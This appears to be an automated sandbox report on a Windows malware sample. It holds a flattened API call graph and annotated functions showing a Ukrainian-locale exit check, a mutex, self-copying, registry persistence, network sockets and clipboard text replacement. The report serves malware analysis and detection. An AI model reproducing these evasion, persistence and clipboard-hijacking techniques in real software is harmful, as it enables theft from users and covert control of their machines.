5938->5937 5939 40abd0 8 API calls 5938->5939 5940 40605c 5939->5940 5940->5937 5504 406fc6 5508 406fa8 5504->5508 5505 4070e8 Sleep 5505->5508 5506 406fd9 5507 406300 4 API calls 5506->5507 5510 406fea 5507->5510 5508->5505 5508->5506 5509 4070f8 ExitThread 5508->5509 5511 4063e0 4 API calls 5508->5511 5512 407010 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW 5510->5512 5516 40700b 5510->5516 5511->5508 5513 407086 wsprintfW 5512->5513 5514 40709b wsprintfW 5512->5514 5513->5514 5515 4068e0 82 API calls 5514->5515 5515->5516 5941 40f908 5942 40f910 5941->5942 5943 40f9c4 5942->5943 5947 40fb45 5942->5947 5946 40f949 5946->5943 5951 40fa30 RtlUnwind 5946->5951 5948 40fb5a 5947->5948 5950 40fb76 5947->5950 5949 40fbe5 NtQueryVirtualMemory 5948->5949 5948->5950 5949->5950 5950->5946 5952 40fa48 5951->5952 5952->5946 5517 40df50 5520 40bf20 5517->5520 5533 40bf31 5520->5533 5523 40ab60 __aligned_recalloc_base 3 API calls 5524 40c2ff 5523->5524 5525 40c310 21 API calls 5525->5533 5527 40bf4f 5527->5523 5529 40bed0 13 API calls 5529->5533 5530 40b830 32 API calls 5530->5533 5533->5525 5533->5527 5533->5529 5533->5530 5534 40c460 5533->5534 5541 40bc00 EnterCriticalSection 5533->5541 5546 407240 5533->5546 5551 4072e0 5533->5551 5556 407110 5533->5556 5563 407210 5533->5563 5535 40c471 lstrlenA 5534->5535 5536 40cb40 7 API calls 5535->5536 5537 40c48f 5536->5537 5537->5535 5539 40c49b 5537->5539 5538 40ab60 __aligned_recalloc_base 3 API calls 5540 40c51f 5538->5540 5539->5538 5539->5540 5540->5533 5542 40bc18 5541->5542 5543 40bc54 LeaveCriticalSection 5542->5543 5566 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 5542->5566 5543->5533 5545 40bc43 5545->5543 5567 407280 5546->5567 5548 407279 5548->5533 5550 40dbe0 17 API calls 5550->5548 5552 407280 75 API calls 5551->5552 5553 4072ff 5552->5553 5554 40732c 5553->5554 5582 407340 5553->5582 5554->5533 5593 405fe0 EnterCriticalSection 5556->5593 5558 40712a 5559 40715d 5558->5559 5598 407170 5558->5598 5559->5533 5562 40ab60 __aligned_recalloc_base 3 API calls 5562->5559 5605 4060a0 EnterCriticalSection 5563->5605 5565 407232 5565->5533 5566->5545 5570 407293 5567->5570 5568 407254 5568->5548 5568->5550 5570->5568 5571 405ef0 EnterCriticalSection 5570->5571 5572 40d1d0 71 API calls 5571->5572 5573 405f0e 5572->5573 5574 405fcb LeaveCriticalSection 5573->5574 5575 405f27 5573->5575 5580 405f48 5573->5580 5574->5570 5576 405f31 memcpy 5575->5576 5577 405f46 5575->5577 5576->5577 5578 40ab60 __aligned_recalloc_base 3 API calls 5577->5578 5579 405fc8 5578->5579 5579->5574 5580->5577 5581 405fa6 memcpy 5580->5581 5581->5577 5585 40be30 5582->5585 5586 40c8b0 3 API calls 5585->5586 5587 40be3b 5586->5587 5588 40be57 lstrlenA 5587->5588 5589 40cb40 7 API calls 5588->5589 5590 40be8d 5589->5590 5591 407385 5590->5591 5592 40ab60 __aligned_recalloc_base 3 API calls 5590->5592 5591->5554 5592->5591 5594 405ffe 5593->5594 5595 40608a LeaveCriticalSection 5594->5595 5596 40abd0 8 API calls 5594->5596 5595->5558 5597 40605c 5596->5597 5597->5595 5599 40a950 __aligned_recalloc_base 7 API calls 5598->5599 5600 407182 memcpy 5599->5600 5601 40be30 13 API calls 5600->5601 5602 4071ec 5601->5602 5603 40ab60 __aligned_recalloc_base 3 API calls 5602->5603 5604 407151 5603->5604 5604->5562 5630 40d230 5605->5630 5608 4062e3 LeaveCriticalSection 5608->5565 5609 40d1d0 71 API calls 5610 4060d9 5609->5610 5610->5608 5611 406134 memcpy 5610->5611 5613 4061f8 5610->5613 5614 40ab60 __aligned_recalloc_base 3 API calls 5611->5614 5612 406221 5615 40ab60 __aligned_recalloc_base 3 API calls 5612->5615 5613->5612 5616 405d30 76 API calls 5613->5616 5617 406158 5614->5617 5618 406242 5615->5618 5616->5612 5619 40abd0 8 API calls 5617->5619 5618->5608 5620 406251 CreateFileW 5618->5620 5621 406168 5619->5621 5620->5608 5622 406274 5620->5622 5623 40ab60 __aligned_recalloc_base 3 API calls 5621->5623 5625 406291 WriteFile 5622->5625 5626 4062cf FlushFileBuffers CloseHandle 5622->5626 5624 40618f 5623->5624 5627 40cb40 7 API calls 5624->5627 5625->5622 5626->5608 5628 4061c5 5627->5628 5629 4076c0 72 API calls 5628->5629 5629->5613 5633 40c780 5630->5633 5635 40c791 5633->5635 5634 40abd0 8 API calls 5634->5635 5635->5634 5636 40c6e0 70 API calls 5635->5636 5638 40c7ab 5635->5638 5640 4084a0 68 API calls 5635->5640 5641 40c7eb memcmp 5635->5641 5636->5635 5637 40ab60 __aligned_recalloc_base 3 API calls 5639 4060c2 5637->5639 5638->5637 5639->5608 5639->5609 5640->5635 5641->5635 5641->5638 5642 401f50 GetQueuedCompletionStatus 5643 401f92 5642->5643 5648 402008 5642->5648 5644 401f97 WSAGetOverlappedResult 5643->5644 5649 401d60 5643->5649 5644->5643 5645 401fb9 WSAGetLastError 5644->5645 5645->5643 5647 401fd3 GetQueuedCompletionStatus 5647->5643 5647->5648 5650 401ef2 InterlockedDecrement setsockopt closesocket 5649->5650 5651 401d74 5649->5651 5652 401e39 5650->5652 5651->5650 5653 401d7c 5651->5653 5652->5647 5669 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 5653->5669 5655 401d81 InterlockedExchange 5656 401d98 5655->5656 5657 401e4e 5655->5657 5656->5652 5660 401da9 InterlockedDecrement 5656->5660 5661 401dbc InterlockedDecrement InterlockedExchangeAdd 5656->5661 5658 401e67 5657->5658 5659 401e57 InterlockedDecrement 5657->5659 5662 401e72 5658->5662 5663 401e87 InterlockedDecrement 5658->5663 5659->5647 5660->5647 5665 401e2f 5661->5665 5678 401ae0 WSASend 5662->5678 5664 401ee9 5663->5664 5664->5647 5670 401cf0 5665->5670 5667 401e7e 5667->5647 5669->5655 5671 401d00 InterlockedExchangeAdd 5670->5671 5672 401cfc 5670->5672 5673 401d53 5671->5673 5674 401d17 InterlockedIncrement 5671->5674 5672->5652 5673->5652 5684 401c50 WSARecv 5674->5684 5676 401d46 5676->5673 5677 401d4c InterlockedDecrement 5676->5677 5677->5673 5679 401b50 5678->5679 5680 401b12 WSAGetLastError 5678->5680 5679->5667 5680->5679 5681 401b1f 5680->5681 5682 401b56 5681->5682 5683 401b26 Sleep WSASend 5681->5683 5682->5667 5683->5679 5683->5680 5685 401cd2 5684->5685 5686 401c8e 5684->5686 5685->5676 5687 401c90 WSAGetLastError 5686->5687 5688 401ca4 Sleep WSARecv 5686->5688 5689 401cdb 5686->5689 5687->5685 5687->5686 5688->5685 5688->5687 5689->5676 5690 40db50 5695 401b60 5690->5695 5692 40db65 5693 40db84 5692->5693 5694 401b60 16 API calls 5692->5694 5694->5693 5696 401b70 5695->5696 5714 401c42 5695->5714 5697 40a740 7 API calls 5696->5697 5696->5714 5698 401b9d 5697->5698 5699 40abd0 8 API calls 5698->5699 5698->5714 5700 401bc9 5699->5700 5701 401be6 5700->5701 5702 401bd6 5700->5702 5703 401ae0 4 API calls 5701->5703 5704 40ab60 __aligned_recalloc_base 3 API calls 5702->5704 5705 401bf3 5703->5705 5706 401bdc 5704->5706 5707 401c33 5705->5707 5708 401bfc EnterCriticalSection 5705->5708 5706->5692 5711 40ab60 __aligned_recalloc_base 3 API calls 5707->5711 5709 401c13 5708->5709 5710 401c1f LeaveCriticalSection 5708->5710 5709->5710 5710->5692 5712 401c3c 5711->5712 5713 40ab60 __aligned_recalloc_base 3 API calls 5712->5713 5713->5714 5714->5692 5715 40bdd0 5716 40bdd3 WaitForSingleObject 5715->5716 5717 40be01 5716->5717 5718 40bdeb InterlockedDecrement 5716->5718 5719 40bdfa 5718->5719 5719->5716 5720 40b510 16 API calls 5719->5720 5720->5719 5721 40dfd0 5731 4013b0 5721->5731 5724 40dff7 InterlockedExchangeAdd 5725 40e03b WaitForSingleObject 5724->5725 5726 40dfdd 5724->5726 5725->5726 5727 40e054 5725->5727 5726->5724 5726->5725 5730 40e05d 5726->5730 5743 40bbb0 EnterCriticalSection 5726->5743 5748 40bed0 5726->5748 5751 401330 5727->5751 5732 40a740 7 API calls 5731->5732 5733 4013bb CreateEventA socket 5732->5733 5734 4013f2 5733->5734 5735 4013f8 5733->5735 5736 401330 8 API calls 5734->5736 5737 401401 bind 5735->5737 5738 401462 5735->5738 5736->5735 5739 401444 CreateThread 5737->5739 5740 401434 5737->5740 5738->5726 5739->5738 5741 401330 8 API calls 5740->5741 5742 40143a 5741->5742 5742->5726 5744 40bbe7 LeaveCriticalSection 5743->5744 5745 40bbcf 5743->5745 5744->5726 5746 40c870 3 API calls 5745->5746 5747 40bbda 5746->5747 5747->5744 5749 40be30 13 API calls 5748->5749 5750 40bf11 5749->5750 5750->5726 5752 401339 5751->5752 5759 40139b 5751->5759 5753 401341 SetEvent WaitForSingleObject CloseHandle 5752->5753 5752->5759 5755 401369 5753->5755 5760 40138b 5753->5760 5756 40ab60 GetCurrentProcessId HeapValidate HeapFree __aligned_recalloc_base 5755->5756 5755->5760 5756->5755 5757 401395 5758 40ab60 __aligned_recalloc_base 3 API calls 5757->5758 5758->5759 5759->5730 5761 40b4f0 shutdown closesocket 5760->5761 5761->5757 5762 40d9d0 5763 40d9e6 5762->5763 5767 40da3e 5762->5767 5764 40d9f0 5763->5764 5765 40da43 5763->5765 5766 40da93 5763->5766 5763->5767 5768 40a740 7 API calls 5764->5768 5770 40da68 5765->5770 5771 40da5b InterlockedDecrement 5765->5771 5796 40c570 5766->5796 5772 40d9fd 5768->5772 5773 40ab60 __aligned_recalloc_base 3 API calls 5770->5773 5771->5770 5785 4023d0 5772->5785 5775 40da74 5773->5775 5776 40ab60 __aligned_recalloc_base 3 API calls 5775->5776 5776->5767 5780 40da2b InterlockedIncrement 5780->5767 5782 40daf1 IsBadReadPtr 5783 40dab9 5782->5783 5783->5767 5783->5782 5784 40bf20 195 API calls 5783->5784 5801 40c670 5783->5801 5784->5783 5786 402413 5785->5786 5787 4023d9 5785->5787 5789 40b6f0 5786->5789 5787->5786 5788 4023ea InterlockedIncrement 5787->5788 5788->5786 5790 40b780 2 API calls 5789->5790 5791 40b6ff 5790->5791 5792 40b70d EnterCriticalSection 5791->5792 5793 40b709 5791->5793 5794 40b72c LeaveCriticalSection 5792->5794 5793->5767 5793->5780 5794->5793 5797 40c583 5796->5797 5798 40c5ad memcpy 5796->5798 5799 40a990 9 API calls 5797->5799 5798->5783 5800 40c5a4 5799->5800 5800->5798 5802 40c699 5801->5802 5803 40c68e 5801->5803 5802->5803 5804 40c6b1 memmove 5802->5804 5803->5783 5804->5803 5967 40f910 5968 40f92e 5967->5968 5970 40f9c4 5967->5970 5969 40fb45 NtQueryVirtualMemory 5968->5969 5972 40f949 5969->5972 5971 40fa30 RtlUnwind 5971->5972 5972->5970 5972->5971 5973 40d510 5974 40b6f0 4 API calls 5973->5974 5975 40d523 5974->5975 5976 40d53a 5975->5976 5978 40d550 InterlockedExchangeAdd 5975->5978 5979 40d56d 5978->5979 5989 40d566 5978->5989 5995 40d840 5979->5995 5982 40d58d InterlockedIncrement 5992 40d597 5982->5992 5983 40bed0 13 API calls 5983->5992 5984 40d5c0 6002 40b3d0 inet_ntoa 5984->6002 5986 40d5cc 5987 40d690 InterlockedDecrement 5986->5987 6003 40b4f0 shutdown closesocket 5987->6003 5989->5976 5990 40a950 __aligned_recalloc_base 7 API calls 5990->5992 5991 40d770 6 API calls 5991->5992 5992->5983 5992->5984 5992->5987 5992->5990 5992->5991 5993 40bf20 195 API calls 5992->5993 5994 40ab60 __aligned_recalloc_base 3 API calls 5992->5994 5993->5992 5994->5992 5996 40d84d socket 5995->5996 5997 40d862 htons connect 5996->5997 5998 40d8bf 5996->5998 5997->5998 5999 40d8aa 5997->5999 5998->5996 6000 40d57d 5998->6000 6004 40b4f0 shutdown closesocket 5999->6004 6000->5982 6000->5989 6002->5986 6003->5989 6004->6000 6005 401920 GetTickCount WaitForSingleObject 6006 401ac9 6005->6006 6007 40194d WSAWaitForMultipleEvents 6005->6007 6008 4019f0 GetTickCount 6007->6008 6009 40196a WSAEnumNetworkEvents 6007->6009 6010 401a43 GetTickCount 6008->6010 6011 401a05 EnterCriticalSection 6008->6011 6009->6008 6025 401983 6009->6025 6014 401ab5 WaitForSingleObject 6010->6014 6015 401a4e EnterCriticalSection 6010->6015 6012 401a16 6011->6012 6013 401a3a LeaveCriticalSection 6011->6013 6019 401a29 LeaveCriticalSection 6012->6019 6047 401820 6012->6047 6013->6014 6014->6006 6014->6007 6017 401aa1 LeaveCriticalSection GetTickCount 6015->6017 6018 401a5f InterlockedExchangeAdd 6015->6018 6016 401992 accept 6016->6008 6016->6025 6017->6014 6065 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 6018->6065 6019->6014 6023 401a72 6023->6017 6023->6018 6066 40b4f0 shutdown closesocket 6023->6066 6025->6008 6025->6016 6026 401cf0 7 API calls 6025->6026 6027 4022c0 6025->6027 6026->6008 6028 4022d2 EnterCriticalSection 6027->6028 6029 4022cd 6027->6029 6030 4022e7 6028->6030 6031 4022fd LeaveCriticalSection 6028->6031 6029->6025 6030->6031 6032 402308 6031->6032 6033 40230f 6031->6033 6032->6025 6034 40a740 7 API calls 6033->6034 6035 402319 6034->6035 6036 402326 getpeername CreateIoCompletionPort 6035->6036 6037 4023b8 6035->6037 6038 4023b2 6036->6038 6039 402366 6036->6039 6069 40b4f0 shutdown closesocket 6037->6069 6042 40ab60 __aligned_recalloc_base 3 API calls 6038->6042 6067 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 6039->6067 6042->6037 6043 4023c3 6043->6025 6044 40236b InterlockedExchange InitializeCriticalSection InterlockedIncrement 6068 4021e0 EnterCriticalSection LeaveCriticalSection 6044->6068 6046 4023ab 6046->6025 6048 40190f 6047->6048 6049 401830 6047->6049 6048->6013 6049->6048 6050 40183d InterlockedExchangeAdd 6049->6050 6050->6048 6056 401854 6050->6056 6051 401880 6052 401891 6051->6052 6079 40b4f0 shutdown closesocket 6051->6079 6055 4018a7 InterlockedDecrement 6052->6055 6057 401901 6052->6057 6055->6057 6056->6048 6056->6051 6070 4017a0 EnterCriticalSection 6056->6070 6058 402247 6057->6058 6059 402265 EnterCriticalSection 6057->6059 6058->6013 6060 40229c LeaveCriticalSection DeleteCriticalSection 6059->6060 6063 40227d 6059->6063 6061 40ab60 __aligned_recalloc_base 3 API calls 6060->6061 6061->6058 6062 40ab60 GetCurrentProcessId HeapValidate HeapFree __aligned_recalloc_base 6062->6063 6063->6062 6064 40229b 6063->6064 6064->6060 6065->6023 6066->6023 6067->6044 6068->6046 6069->6043 6071 401807 LeaveCriticalSection 6070->6071 6072 4017ba InterlockedExchangeAdd 6070->6072 6071->6056 6073 4017ca LeaveCriticalSection 6072->6073 6074 4017d9 6072->6074 6073->6056 6075 40ab60 __aligned_recalloc_base 3 API calls 6074->6075 6076 4017fe 6075->6076 6077 40ab60 __aligned_recalloc_base 3 API calls 6076->6077 6078 401804 6077->6078 6078->6071 6079->6052 6080 40dfa0 6083 401200 6080->6083 6082 40dfc2 6084 40121d 6083->6084 6097 401314 6083->6097 6085 40a950 __aligned_recalloc_base 7 API calls 6084->6085 6084->6097 6086 401247 memcpy htons 6085->6086 6087 4012ed 6086->6087 6088 401297 sendto 6086->6088 6089 40ab60 __aligned_recalloc_base 3 API calls 6087->6089 6090 4012b6 InterlockedExchangeAdd 6088->6090 6091 4012e9 6088->6091 6092 4012fc 6089->6092 6090->6088 6093 4012cc 6090->6093 6091->6087 6094 40130a 6091->6094 6092->6082 6096 40ab60 __aligned_recalloc_base 3 API calls 6093->6096 6095 40ab60 __aligned_recalloc_base 3 API calls 6094->6095 6095->6097 6098 4012db 6096->6098 6097->6082 6098->6082 6099 40eba1 6100 40ebaa 6099->6100 6101 40ec9d 6100->6101 6102 40ec13 lstrcmpiW 6100->6102 6103 40ec93 SysFreeString 6102->6103 6104 40ec26 6102->6104 6103->6101 6105 40e990 2 API calls 6104->6105 6107 40ec34 6105->6107 6106 40ec85 6106->6103 6107->6103 6107->6106 6108 40ec63 lstrcmpiW 6107->6108 6109 40ec75 6108->6109 6110 40ec7b SysFreeString 6108->6110 6109->6110 6110->6106 5805 406de4 5814 406d8a 5805->5814 5806 406dba lstrcmpiW 5806->5814 5807 406f35 FindNextFileW 5808 406f51 FindClose 5807->5808 5809 406d5e lstrcmpW 5807->5809 5811 406f5e 5808->5811 5813 406d74 lstrcmpW 5809->5813 5809->5814 5810 406e21 PathMatchSpecW 5812 406e42 wsprintfW SetFileAttributesW DeleteFileW 5810->5812 5810->5814 5812->5814 5813->5814 5814->5806 5814->5807 5814->5810 5815 406e9f PathFileExistsW 5814->5815 5818 4067a0 11 API calls 5814->5818 5815->5814 5816 406eb5 wsprintfW wsprintfW 5815->5816 5816->5814 5817 406f1f MoveFileExW 5816->5817 5817->5807 5818->5814 6111 40792a ExitThread 5819 40e070 5825 401470 5819->5825 5821 40e084 5822 40e0af 5821->5822 5823 40e095 WaitForSingleObject 5821->5823 5824 401330 8 API calls 5823->5824 5824->5822 5826 401483 5825->5826 5827 401572 5825->5827 5826->5827 5828 40a740 7 API calls 5826->5828 5827->5821 5829 401498 CreateEventA socket 5828->5829 5830 4014cf 5829->5830 5833 4014d5 5829->5833 5831 401330 8 API calls 5830->5831 5831->5833 5832 4014e2 htons setsockopt bind 5834 401546 5832->5834 5835 401558 CreateThread 5832->5835 5833->5827 5833->5832 5836 401330 8 API calls 5834->5836 5835->5827 5838 401100 5835->5838 5837 40154c 5836->5837 5837->5821 5839 401115 ioctlsocket 5838->5839 5840 4011e4 5839->5840 5842 40113a 5839->5842 5841 40ab60 __aligned_recalloc_base 3 API calls 5840->5841 5844 4011ea 5841->5844 5843 4011cd WaitForSingleObject 5842->5843 5845 40a990 9 API calls 5842->5845 5846 401168 recvfrom 5842->5846 5847 4011ad InterlockedExchangeAdd 5842->5847 5843->5839 5843->5840 5845->5842 5846->5842 5846->5843 5849 401000 5847->5849 5850 401014 5849->5850 5851 40103b 5850->5851 5853 40a740 7 API calls 5850->5853 5860 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 5851->5860 5853->5851 5854 40105b 5861 401580 5854->5861 5856 4010ec 5856->5842 5857 4010a3 IsBadReadPtr 5859 401071 5857->5859 5858 4010d8 memmove 5858->5859 5859->5856 5859->5857 5859->5858 5860->5854 5862 401592 5861->5862 5863 4015a5 memcpy 5861->5863 5865 40a990 9 API calls 5862->5865 5864 4015c1 5863->5864 5864->5859 5866 40159f 5865->5866 5866->5863 6112 40d6b0 6117 40d710 6112->6117 6114 40d6de 6116 40d710 send 6116->6114 6118 40d721 send 6117->6118 6119 40d6c3 6118->6119 6120 40d73e 6118->6120 6119->6114 6119->6116 6120->6118 6120->6119 6121 40d930 6122 40d934 6121->6122 6123 40bbb0 5 API calls 6122->6123 6124 40d950 WaitForSingleObject 6122->6124 6125 40d550 209 API calls 6122->6125 6126 40d975 6122->6126 6123->6122 6124->6122 6124->6126 6125->6122 6127 4059b0 GetWindowLongW 6128 4059d4 6127->6128 6129 4059f6 6127->6129 6130 4059e1 6128->6130 6131 405a67 IsClipboardFormatAvailable 6128->6131 6137 405a46 6129->6137 6138 405a2e SetWindowLongW 6129->6138 6146 4059f1 6129->6146 6134 405a04 SetClipboardViewer SetWindowLongW 6130->6134 6135 4059e7 6130->6135 6132 405a83 IsClipboardFormatAvailable 6131->6132 6133 405a7a 6131->6133 6132->6133 6139 405a98 IsClipboardFormatAvailable 6132->6139 6142 405ab5 OpenClipboard 6133->6142 6161 405b7c 6133->6161 6136 405be4 DefWindowProcA 6134->6136 6140 405b9d RegisterRawInputDevices ChangeClipboardChain 6135->6140 6135->6146 6141 405a4c SendMessageA 6137->6141 6137->6146 6138->6146 6139->6133 6140->6136 6141->6146 6143 405ac5 GetClipboardData 6142->6143 6142->6161 6145 405add GlobalLock 6143->6145 6143->6146 6144 405b85 SendMessageA 6144->6146 6145->6146 6147 405af5 6145->6147 6146->6136 6148 405b08 6147->6148 6149 405b29 6147->6149 6151 405b3e 6148->6151 6152 405b0e 6148->6152 6150 40d250 13 API calls 6149->6150 6153 405b14 GlobalUnlock CloseClipboard 6150->6153 6168 4057f0 6151->6168 6152->6153 6162 405680 6152->6162 6157 405b67 6153->6157 6153->6161 6176 404970 lstrlenW 6157->6176 6160 40ab60 __aligned_recalloc_base 3 API calls 6160->6161 6161->6144 6161->6146 6164 40568b 6162->6164 6163 405691 lstrlenW 6163->6164 6165 4056a4 6163->6165 6164->6163 6164->6165 6166 40a950 __aligned_recalloc_base 7 API calls 6164->6166 6167 4056c1 lstrcpynW 6164->6167 6165->6153 6166->6164 6167->6164 6167->6165 6173 4057fd 6168->6173 6169 405803 lstrlenA 6169->6173 6174 405816 6169->6174 6170 405740 2 API calls 6170->6173 6171 40a950 __aligned_recalloc_base 7 API calls 6171->6173 6173->6169 6173->6170 6173->6171 6173->6174 6175 40ab60 __aligned_recalloc_base 3 API calls 6173->6175 6210 4057a0 6173->6210 6174->6153 6175->6173 6184 4049a4 6176->6184 6177 404bfd 6177->6160 6178 404e81 StrStrW 6180 404e94 6178->6180 6181 404e98 StrStrW 6178->6181 6179 404c0f 6179->6177 6179->6178 6180->6181 6182 404eab 6181->6182 6183 404eaf StrStrW 6181->6183 6182->6183 6185 404ec2 6183->6185 6184->6177 6184->6179 6187 404d90 StrStrW 6184->6187 6197 404ed8 6185->6197 6215 4048a0 lstrlenW 6185->6215 6187->6179 6188 404dbb StrStrW 6187->6188 6188->6179 6189 404de6 StrStrW 6188->6189 6189->6179 6190 4054aa StrStrW 6194 4054c4 StrStrW 6190->6194 6195 4054bd 6190->6195 6191 40544f StrStrW 6192 405462 6191->6192 6193 40546b StrStrW 6191->6193 6192->6190 6193->6192 6196 405487 StrStrW 6193->6196 6198 4054d7 6194->6198 6199 4054de StrStrW 6194->6199 6195->6194 6196->6192 6197->6177 6197->6190 6197->6191 6198->6199 6200 4054f1 6199->6200 6201 4054f8 StrStrW 6199->6201 6200->6201 6202 405512 StrStrW 6201->6202 6203 40550b 6201->6203 6204 405525 lstrlenA 6202->6204 6203->6202 6204->6177 6206 4055ff GlobalAlloc 6204->6206 6206->6177 6207 40561a GlobalLock 6206->6207 6207->6177 6208 40562d memcpy GlobalUnlock OpenClipboard 6207->6208 6208->6177 6209 40565a EmptyClipboard SetClipboardData CloseClipboard 6208->6209 6209->6177 6211 4057ab 6210->6211 6212 4057b1 lstrlenA 6211->6212 6213 405740 2 API calls 6211->6213 6214 4057e4 6211->6214 6212->6211 6213->6211 6214->6173 6218 4048c4 6215->6218 6216 404911 iswalpha 6216->6218 6219 40492c iswdigit 6216->6219 6217 40490d 6217->6197 6218->6216 6218->6217 6218->6219 6219->6218 5867 4084f9 5868 408502 5867->5868 5869 408511 34 API calls 5868->5869 5870 409346 5868->5870 6220 405fbd 6222 405f51 6220->6222 6221 40ab60 __aligned_recalloc_base 3 API calls 6223 405fc8 LeaveCriticalSection 6221->6223 6224 405fa6 memcpy 6222->6224 6225 405fbb 6222->6225 6224->6225 6225->6221 6227 40ac3e 6228 40ab60 __aligned_recalloc_base 3 API calls 6227->6228 6231 40abfd 6228->6231 6229 40ac12 6230 40a950 __aligned_recalloc_base 7 API calls 6230->6231 6231->6229 6231->6230 6232 40ac14 memcpy 6231->6232 6232->6231

                                                                                                                                    Executed Functions

                                                                                                                                    Function 0040F1B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22stringCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 88 40f1b0-40f1dc GetLocaleInfoA strcmp 89 40f1e2 88->89 90 40f1de-40f1e0 88->90 91 40f1e4-40f1e7 89->91 90->91
                                                                                                                                    APIs
                                                                                                                                    • GetLocaleInfoA.KERNELBASE(00000400,00000007,?,0000000A,?,?,00407A28), ref: 0040F1C3
                                                                                                                                    • strcmp.NTDLL ref: 0040F1D2
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InfoLocalestrcmp
                                                                                                                                    • String ID: UKR
                                                                                                                                    • API String ID: 3191669094-64918367
                                                                                                                                    • Opcode ID: 8e44c828f7342be6b1b961f5fa6f40dd4523076a999cbca5f949ecc83b5425ee
                                                                                                                                    • Instruction ID: 1be06a77ef1098bc08a48f46d8927727b75ba0885e831d13d66ebc3380d14d50
                                                                                                                                    • Opcode Fuzzy Hash: 8e44c828f7342be6b1b961f5fa6f40dd4523076a999cbca5f949ecc83b5425ee
                                                                                                                                    • Instruction Fuzzy Hash: FDE01276E44308B6DA20A6A0AD02BE6776C6715705F0001B6BE08AA5C1E9B9961DC7EA
                                                                                                                                    Function 00407940 Relevance: 282.5, APIs: 103, Strings: 58, Instructions: 749sleepfilesynchronizationCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 0 407940-407974 Sleep CreateMutexA GetLastError 1 407976-407978 ExitProcess 0->1 2 40797e-407a1d GetModuleFileNameW PathFindFileNameW wsprintfW DeleteFileW ExpandEnvironmentStringsW wcscmp 0->2 3 407d31-407d9d Sleep ShellExecuteW * 2 RegOpenKeyExW 2->3 4 407a23-407a2e call 40f1b0 2->4 5 407dcb-407df6 RegOpenKeyExW 3->5 6 407d9f-407dc5 RegSetValueExW RegCloseKey 3->6 13 407a30-407a32 ExitProcess 4->13 14 407a38-407a86 ExpandEnvironmentStringsW wsprintfW CopyFileW 4->14 8 407e24-407e4f RegOpenKeyExW 5->8 9 407df8-407e1e RegSetValueExW RegCloseKey 5->9 6->5 11 407e51-407e77 RegSetValueExW RegCloseKey 8->11 12 407e7d-407ea8 RegOpenKeyExW 8->12 9->8 11->12 17 407ed6-407f01 RegOpenKeyExW 12->17 18 407eaa-407ed0 RegSetValueExW RegCloseKey 12->18 15 407b36-407b78 Sleep wsprintfW CopyFileW 14->15 16 407a8c-407ac6 SetFileAttributesW RegOpenKeyExW 14->16 22 407c28-407c81 Sleep ExpandEnvironmentStringsW wsprintfW CopyFileW 15->22 23 407b7e-407bb8 SetFileAttributesW RegOpenKeyExW 15->23 16->15 21 407ac8-407afb wcslen RegSetValueExW 16->21 19 407f03-407f29 RegSetValueExW RegCloseKey 17->19 20 407f2f-407f5a RegOpenKeyExW 17->20 18->17 19->20 25 407f88-407fb3 RegOpenKeyExW 20->25 26 407f5c-407f82 RegSetValueExW RegCloseKey 20->26 27 407b29-407b30 RegCloseKey 21->27 28 407afd-407b1f RegCloseKey call 40f400 21->28 22->3 24 407c87-407cc1 SetFileAttributesW RegOpenKeyExW 22->24 23->22 29 407bba-407bed wcslen RegSetValueExW 23->29 24->3 30 407cc3-407cf6 wcslen RegSetValueExW 24->30 32 407fb5-408019 RegSetValueExW * 3 RegCloseKey 25->32 33 40801f-40804a RegOpenKeyExW 25->33 26->25 27->15 28->27 43 407b21-407b23 ExitProcess 28->43 34 407c1b-407c22 RegCloseKey 29->34 35 407bef-407c11 RegCloseKey call 40f400 29->35 36 407d24-407d2b RegCloseKey 30->36 37 407cf8-407d1a RegCloseKey call 40f400 30->37 32->33 39 408050-4080d3 RegSetValueExW * 4 RegCloseKey 33->39 40 4080d9-408104 RegOpenKeyExW 33->40 34->22 35->34 50 407c13-407c15 ExitProcess 35->50 36->3 37->36 51 407d1c-407d1e ExitProcess 37->51 39->40 44 4081f0-40821b RegOpenKeyExW 40->44 45 40810a-4081ea RegSetValueExW * 7 RegCloseKey 40->45 48 408221-408301 RegSetValueExW * 7 RegCloseKey 44->48 49 408307-40831c Sleep call 40d180 44->49 45->44 48->49 54 408491-40849a 49->54 55 408322-40848e WSAStartup wsprintfW * 2 CreateThread Sleep CreateThread Sleep CreateThread Sleep call 405c00 call 40e0c0 call 407390 CreateEventA call 40c8b0 call 40dbb0 call 40bc70 call 40dbe0 * 4 call 40dd50 call 40de90 49->55 55->54
                                                                                                                                    APIs
                                                                                                                                    • Sleep.KERNELBASE(000007D0), ref: 0040794E
                                                                                                                                    • CreateMutexA.KERNELBASE(00000000,00000000,mmn7nnm8na), ref: 0040795D
                                                                                                                                    • GetLastError.KERNEL32 ref: 00407969
                                                                                                                                    • ExitProcess.KERNEL32 ref: 00407978
                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,004161D0,00000105), ref: 004079B2
                                                                                                                                    • PathFindFileNameW.SHLWAPI(004161D0), ref: 004079BD
                                                                                                                                    • wsprintfW.USER32 ref: 004079DA
                                                                                                                                    • DeleteFileW.KERNELBASE(?), ref: 004079EA
